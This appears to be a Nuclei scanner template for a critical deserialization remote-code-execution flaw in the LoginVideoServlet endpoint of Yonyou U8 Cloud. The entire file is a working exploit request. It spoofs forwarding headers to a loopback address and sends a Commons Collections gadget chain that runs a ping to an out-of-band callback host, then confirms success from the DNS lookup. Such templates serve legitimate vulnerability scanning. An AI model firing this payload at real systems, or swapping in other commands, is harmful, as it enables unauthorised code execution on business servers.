id: yonyou-u8c-loginvideoservlet-rce

info:
  name: 用友U8 Cloud /servlet/LoginVideoServlet 接口反序列化
  author: SleepingBag945
  severity: critical


http:
  - raw:
    - |
      POST /servlet/LoginVideoServlet HTTP/1.1
      Host: {{Hostname}}
      X-Forwarded-For: 127.0.0.10
      X-Originating-IP: 127.0.0.10
      X-Remote-Addr: 127.0.0.10
      X-Remote-IP: 127.0.0.10

      {{generate_java_gadget("commons-collections3.1", "ping {{interactsh-url}}", "raw")}}


    matchers:
      - type: word
        part: interactsh_protocol 
        words:
          - "dns"
